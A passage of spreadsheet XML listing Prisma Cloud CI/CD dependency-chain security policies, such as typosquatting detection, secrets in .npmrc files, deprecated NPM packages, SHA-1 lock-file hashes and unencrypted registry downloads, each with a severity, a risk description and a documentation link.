      <c r="K210" t="inlineStr">
        <is>
          <t>NPM package downloaded from git without commit hash reference in a Bitbucket repository</t>
        </is>
      </c>
      <c r="L210" t="inlineStr"/>
      <c r="M210" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N210" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O210" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P210" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q210" t="inlineStr"/>
      <c r="R210" t="inlineStr"/>
      <c r="S210" t="inlineStr"/>
      <c r="T210" t="b">
        <v>0</v>
      </c>
      <c r="U210" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V210" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="W210" t="inlineStr">
        <is>
          <t>NPM packages can be installed using a URL of a git repository, which may contain a reference to a branch, tag or commit hash. Without using a commit hash reference, the integrity of the downloaded package cannot be guaranteed. This can result in developers or build servers downloading a different version of the package than intended, potentially containing malicious code. This could expose both the development and production environments to risks.</t>
        </is>
      </c>
      <c r="X210" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/bitbucket-cicd-pipeline-policies/bb-npm-download-no-commit-hash-ref</t>
        </is>
      </c>
      <c r="Y210" t="inlineStr"/>
      <c r="Z210" t="inlineStr">
        <is>
          <t>{"category":"Dependency Chains","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA210" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB210" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC210" t="inlineStr"/>
      <c r="AD210" t="b">
        <v>1</v>
      </c>
      <c r="AE210" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF210" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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0" t="inlineStr">
        <is>
          <t>cf52f60b-58cb-4f65-8f7b-6f0ce448ddff</t>
        </is>
      </c>
      <c r="AI210" t="inlineStr"/>
      <c r="AJ210" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK210" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="211">
      <c r="A211" t="inlineStr"/>
      <c r="B211" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C211" s="2" t="inlineStr"/>
      <c r="D211" t="inlineStr"/>
      <c r="E211" t="inlineStr"/>
      <c r="F211" t="inlineStr"/>
      <c r="G211" t="b">
        <v>1</v>
      </c>
      <c r="H2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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J211" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="K211" t="inlineStr">
        <is>
          <t>Possible Python typosquatting detected in a GitLab repository</t>
        </is>
      </c>
      <c r="L211" t="inlineStr"/>
      <c r="M211" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N211" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O211" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P211" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q211" t="inlineStr"/>
      <c r="R211" t="inlineStr"/>
      <c r="S211" t="inlineStr"/>
      <c r="T211" t="b">
        <v>0</v>
      </c>
      <c r="U211" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V211" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="W211" t="inlineStr">
        <is>
          <t>Typosquatting attacks involve the registration of malicious packages in public registries, using names that closely resemble popular or internal packages used by an organization. The objective is to exploit users' mistakes when typing package names, resulting in the unintentional download of the malicious package. Running malicious packages on developers endpoints or in CI pipelines can lead to credential theft, source code leakage, code tampering and more.</t>
        </is>
      </c>
      <c r="X211" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/gitlab-cicd-pipeline-policies/gl-possible-python-typosquat-repo</t>
        </is>
      </c>
      <c r="Y211" t="inlineStr"/>
      <c r="Z211" t="inlineStr">
        <is>
          <t>{"category":"Dependency Chains","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA211" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB211" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC211" t="inlineStr"/>
      <c r="AD211" t="b">
        <v>1</v>
      </c>
      <c r="AE211" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF211" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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1" t="inlineStr">
        <is>
          <t>ecf73648-3b05-4c0f-bf4b-305bed88cf08</t>
        </is>
      </c>
      <c r="AI211" t="inlineStr"/>
      <c r="AJ211" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK211" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="212">
      <c r="A212" t="inlineStr"/>
      <c r="B212" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C212" s="2" t="inlineStr"/>
      <c r="D212" t="inlineStr"/>
      <c r="E212" t="inlineStr"/>
      <c r="F212" t="inlineStr"/>
      <c r="G212" t="b">
        <v>1</v>
      </c>
      <c r="H2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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J212" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="K212" t="inlineStr">
        <is>
          <t>NPM project contains unused dependencies in an Azure Repos repository</t>
        </is>
      </c>
      <c r="L212" t="inlineStr"/>
      <c r="M212" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N212" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O212" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P212" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q212" t="inlineStr"/>
      <c r="R212" t="inlineStr"/>
      <c r="S212" t="inlineStr"/>
      <c r="T212" t="b">
        <v>0</v>
      </c>
      <c r="U212" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V212" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="W212" t="inlineStr">
        <is>
          <t>NPM dependencies can potentially execute code during installation. Each added dependency expands the attack surface. Unused dependencies elevate the risk, as they unnecessarily widen the attack surface of a project without valid justification. An unused and compromised dependency exposes the project to unnecessary risks, potentially allowing malicious code to run on developers' endpoints, during build, or in production.</t>
        </is>
      </c>
      <c r="X212" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/azure-repo-cicd-pipeline-policies/azure-repo-npm-project-unused-dependencies</t>
        </is>
      </c>
      <c r="Y212" t="inlineStr"/>
      <c r="Z212" t="inlineStr">
        <is>
          <t>{"category":"Dependency Chains","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA212" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB212" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC212" t="inlineStr"/>
      <c r="AD212" t="b">
        <v>1</v>
      </c>
      <c r="AE212" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF212" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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2" t="inlineStr">
        <is>
          <t>9716c5d7-6842-4aa6-83f9-a7f00b50fa1b</t>
        </is>
      </c>
      <c r="AI212" t="inlineStr"/>
      <c r="AJ212" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK212" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="213">
      <c r="A213" t="inlineStr"/>
      <c r="B213" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C213" s="2" t="inlineStr"/>
      <c r="D213" t="inlineStr"/>
      <c r="E213" t="inlineStr"/>
      <c r="F213" t="inlineStr"/>
      <c r="G213" t="b">
        <v>1</v>
      </c>
      <c r="H2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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J213" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="K213" t="inlineStr">
        <is>
          <t>Secret exposed in proxy URL within '.npmrc' file of a Bitbucket repository</t>
        </is>
      </c>
      <c r="L213" t="inlineStr"/>
      <c r="M213" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N213" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O213" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P213" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q213" t="inlineStr"/>
      <c r="R213" t="inlineStr"/>
      <c r="S213" t="inlineStr"/>
      <c r="T213" t="b">
        <v>0</v>
      </c>
      <c r="U213" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V213" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="W213" t="inlineStr">
        <is>
          <t>Including secrets in a .npmrc file can expose them to attackers who have gained unauthorized access to the repository, allowing them to use those secrets to access protected resources. For example, an attacker could use a secret that is used in a proxy configuration, such as the proxy or https-proxy keys, to access a proxy server and then use the proxy server to access restricted organization assets, such as an internal package registry.</t>
        </is>
      </c>
      <c r="X213" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/bitbucket-cicd-pipeline-policies/bb-secrets-exposed-proxyurl-npmrc</t>
        </is>
      </c>
      <c r="Y213" t="inlineStr"/>
      <c r="Z213" t="inlineStr">
        <is>
          <t>{"category":"Dependency Chains","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA213" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB213" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC213" t="inlineStr"/>
      <c r="AD213" t="b">
        <v>1</v>
      </c>
      <c r="AE213" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF213" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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3" t="inlineStr">
        <is>
          <t>c87f30a6-f917-4eaf-9904-90e05f1461ce</t>
        </is>
      </c>
      <c r="AI213" t="inlineStr"/>
      <c r="AJ213" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK213" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="214">
      <c r="A214" t="inlineStr"/>
      <c r="B214" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C214" s="2" t="inlineStr"/>
      <c r="D214" t="inlineStr"/>
      <c r="E214" t="inlineStr"/>
      <c r="F214" t="inlineStr"/>
      <c r="G214" t="b">
        <v>1</v>
      </c>
      <c r="H2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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J214" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="K214" t="inlineStr">
        <is>
          <t>Secret exposed in registry URL within '.npmrc' file of an Azure repository</t>
        </is>
      </c>
      <c r="L214" t="inlineStr"/>
      <c r="M214" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N214" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O214" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P214" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q214" t="inlineStr"/>
      <c r="R214" t="inlineStr"/>
      <c r="S214" t="inlineStr"/>
      <c r="T214" t="b">
        <v>0</v>
      </c>
      <c r="U214" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V214" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="W214" t="inlineStr">
        <is>
          <t>Including secrets in a .npmrc file can expose them to attackers who have gained unauthorized access to the repository, allowing them to use those secrets to access protected resources. The attacker could potentially use these secrets to impersonate the owner of the secret and to perform actions on their behalf, such as pushing malicious packages to a registry which could reach the production environment or accessing internal packages on the registry.</t>
        </is>
      </c>
      <c r="X214" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/azure-repo-cicd-pipeline-policies/azure-repo-secret-registry-url-npmrcfile</t>
        </is>
      </c>
      <c r="Y214" t="inlineStr"/>
      <c r="Z214" t="inlineStr">
        <is>
          <t>{"category":"Dependency Chains","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA214" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB214" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC214" t="inlineStr"/>
      <c r="AD214" t="b">
        <v>1</v>
      </c>
      <c r="AE214" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF214" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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4" t="inlineStr">
        <is>
          <t>eb7900c4-b0f5-4469-a5c4-0ed1810d5f65</t>
        </is>
      </c>
      <c r="AI214" t="inlineStr"/>
      <c r="AJ214" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK214" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="215">
      <c r="A215" t="inlineStr"/>
      <c r="B215" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C215" s="2" t="inlineStr"/>
      <c r="D215" t="inlineStr"/>
      <c r="E215" t="inlineStr"/>
      <c r="F215" t="inlineStr"/>
      <c r="G215" t="b">
        <v>1</v>
      </c>
      <c r="H2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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J215" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="K215" t="inlineStr">
        <is>
          <t>Deprecated package used in NPM project of a Bitbucket repository</t>
        </is>
      </c>
      <c r="L215" t="inlineStr"/>
      <c r="M215" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N215" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O215" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P215" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q215" t="inlineStr"/>
      <c r="R215" t="inlineStr"/>
      <c r="S215" t="inlineStr"/>
      <c r="T215" t="b">
        <v>0</v>
      </c>
      <c r="U215" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V215" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="W215" t="inlineStr">
        <is>
          <t>Deprecated packages can pose security risks to the project such as code vulnerabilities that can be discovered overtime and malicious package takeover due to configuration that change over time like the maintainer's email domain expiring.</t>
        </is>
      </c>
      <c r="X215" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/bitbucket-cicd-pipeline-policies/bb-deprecated-pckg-npm-project</t>
        </is>
      </c>
      <c r="Y215" t="inlineStr"/>
      <c r="Z215" t="inlineStr">
        <is>
          <t>{"category":"Dependency Chains","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA215" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB215" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC215" t="inlineStr"/>
      <c r="AD215" t="b">
        <v>1</v>
      </c>
      <c r="AE215" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF215" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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5" t="inlineStr">
        <is>
          <t>ac5e0fee-1d30-4530-9825-7a83685adfc1</t>
        </is>
      </c>
      <c r="AI215" t="inlineStr"/>
      <c r="AJ215" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK215" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="216">
      <c r="A216" t="inlineStr"/>
      <c r="B216" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C216" s="2" t="inlineStr"/>
      <c r="D216" t="inlineStr"/>
      <c r="E216" t="inlineStr"/>
      <c r="F216" t="inlineStr"/>
      <c r="G216" t="b">
        <v>1</v>
      </c>
      <c r="H2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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J216" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="K216" t="inlineStr">
        <is>
          <t>Deprecated package used in NPM project of a GitHub repository</t>
        </is>
      </c>
      <c r="L216" t="inlineStr"/>
      <c r="M216" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N216" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O216" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P216" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q216" t="inlineStr"/>
      <c r="R216" t="inlineStr"/>
      <c r="S216" t="inlineStr"/>
      <c r="T216" t="b">
        <v>0</v>
      </c>
      <c r="U216" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V216" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="W216" t="inlineStr">
        <is>
          <t>Deprecated packages can pose security risks to the project such as code vulnerabilities that can be discovered overtime and malicious package takeover due to configuration that change over time like the maintainer's email domain expiring.</t>
        </is>
      </c>
      <c r="X216" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/github-cicd-pipeline-policies/gh-deprecated-pckg-npm-project</t>
        </is>
      </c>
      <c r="Y216" t="inlineStr"/>
      <c r="Z216" t="inlineStr">
        <is>
          <t>{"category":"Dependency Chains","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA216" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB216" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC216" t="inlineStr"/>
      <c r="AD216" t="b">
        <v>1</v>
      </c>
      <c r="AE216" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF216" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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6" t="inlineStr">
        <is>
          <t>05cf3c05-7e69-4d02-9cbf-4c6fd7d26705</t>
        </is>
      </c>
      <c r="AI216" t="inlineStr"/>
      <c r="AJ216" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK216" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="217">
      <c r="A217" t="inlineStr"/>
      <c r="B217" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C217" s="2" t="inlineStr"/>
      <c r="D217" t="inlineStr"/>
      <c r="E217" t="inlineStr"/>
      <c r="F217" t="inlineStr"/>
      <c r="G217" t="b">
        <v>1</v>
      </c>
      <c r="H2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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J217" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="K217" t="inlineStr">
        <is>
          <t>NPM package lock file verifies in Azure repository integrity with weak hash algorithm</t>
        </is>
      </c>
      <c r="L217" t="inlineStr"/>
      <c r="M217" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N217" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O217" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P217" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q217" t="inlineStr"/>
      <c r="R217" t="inlineStr"/>
      <c r="S217" t="inlineStr"/>
      <c r="T217" t="b">
        <v>0</v>
      </c>
      <c r="U217" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V217" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="W217" t="inlineStr">
        <is>
          <t>Old versions of package-lock.json files using SHA-1 to verify the integrity of downloaded dependencies are vulnerable to collision attacks in which two inputs can produce the same output, meaning that attackers can create a malicious package with the same hash of a legitimate package, bypassing the integrity validation. An attacker who has gained access to a maintainer account could trick a pipeline that uses "npm ci" to securely install a package and verify the dependencies integrity by replacing a legitimate package with a malicious version that has the same hash, thereby introducing malicious code which could potentially reach production. Note: Due to SHA-1 vulnerabilities, it was deprecated by NIST in 2011.</t>
        </is>
      </c>
      <c r="X217" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/azure-repo-cicd-pipeline-policies/azure-repo-npm-package-lockfile-weak-hash</t>
        </is>
      </c>
      <c r="Y217" t="inlineStr"/>
      <c r="Z217" t="inlineStr">
        <is>
          <t>{"category":"Dependency Chains","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA217" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB217" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC217" t="inlineStr"/>
      <c r="AD217" t="b">
        <v>1</v>
      </c>
      <c r="AE217" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF217" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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7" t="inlineStr">
        <is>
          <t>a0f6ac5c-6c30-49c3-86df-92cba3d4438e</t>
        </is>
      </c>
      <c r="AI217" t="inlineStr"/>
      <c r="AJ217" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK217" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="218">
      <c r="A218" t="inlineStr"/>
      <c r="B218" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C218" s="2" t="inlineStr"/>
      <c r="D218" t="inlineStr"/>
      <c r="E218" t="inlineStr"/>
      <c r="F218" t="inlineStr"/>
      <c r="G218" t="b">
        <v>1</v>
      </c>
      <c r="H2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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J218" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="K218" t="inlineStr">
        <is>
          <t>NPM package downloaded from git without commit hash reference in an Azure Repos repository</t>
        </is>
      </c>
      <c r="L218" t="inlineStr"/>
      <c r="M218" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N218" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O218" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P218" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q218" t="inlineStr"/>
      <c r="R218" t="inlineStr"/>
      <c r="S218" t="inlineStr"/>
      <c r="T218" t="b">
        <v>0</v>
      </c>
      <c r="U218" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V218" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="W218" t="inlineStr">
        <is>
          <t>NPM packages can be installed using a URL of a git repository, which may contain a reference to a branch, tag or commit hash. Without using a commit hash reference, the integrity of the downloaded package cannot be guaranteed. This can result in developers or build servers downloading a different version of the package than intended, potentially containing malicious code. This could expose both the development and production environments to risks.</t>
        </is>
      </c>
      <c r="X218" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/azure-repo-cicd-pipeline-policies/azure-repo-npm-download-no-commit-hash-ref</t>
        </is>
      </c>
      <c r="Y218" t="inlineStr"/>
      <c r="Z218" t="inlineStr">
        <is>
          <t>{"category":"Dependency Chains","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA218" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB218" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC218" t="inlineStr"/>
      <c r="AD218" t="b">
        <v>1</v>
      </c>
      <c r="AE218" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF218" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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8" t="inlineStr">
        <is>
          <t>fc1aa973-ccd2-4420-b52a-0dd4cec9b363</t>
        </is>
      </c>
      <c r="AI218" t="inlineStr"/>
      <c r="AJ218" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK218" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="219">
      <c r="A219" t="inlineStr"/>
      <c r="B219" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C219" s="2" t="inlineStr"/>
      <c r="D219" t="inlineStr"/>
      <c r="E219" t="inlineStr"/>
      <c r="F219" t="inlineStr"/>
      <c r="G219" t="b">
        <v>1</v>
      </c>
      <c r="H2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9" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J219" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="K219" t="inlineStr">
        <is>
          <t>Unencrypted channel used by '.npmrc' file of an Azure repository to download dependencies from registry</t>
        </is>
      </c>
      <c r="L219" t="inlineStr"/>
      <c r="M219" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N219" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O219" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P219" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q219" t="inlineStr"/>
      <c r="R219" t="inlineStr"/>
      <c r="S219" t="inlineStr"/>
      <c r="T219" t="b">
        <v>0</v>
      </c>
      <c r="U219" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V219" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="W219" t="inlineStr">
        <is>
          <t>Using HTTP instead of HTTPS to download packages from a registry can make them vulnerable to man-in-the-middle attacks. These attacks could potentially inject malicious code into the packages, which may then be executed on the CI or developer's endpoints. This also poses a risk of exposing internal packages to tampering.</t>
        </is>
      </c>
      <c r="X219" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/azure-repo-cicd-pipeline-policies/azure-repo-unencrypted-channel-download-dependecies-registry</t>
        </is>
      </c>
      <c r="Y219" t="inlineStr"/>
      <c r="Z219" t="inlineStr">
        <is>
          <t>{"category":"Dependency Chains","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA219" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB219" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC219" t="inlineStr"/>
      <c r="AD219" t="b">
        <v>1</v>
      </c>
      <c r="AE219" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF219" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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9" t="inlineStr">
        <is>
          <t>5386b3ec-e314-4c71-976b-4ebe8f3bd386</t>
        </is>
      </c>
      <c r="AI219" t="inlineStr"/>
      <c r="AJ219" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK219" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
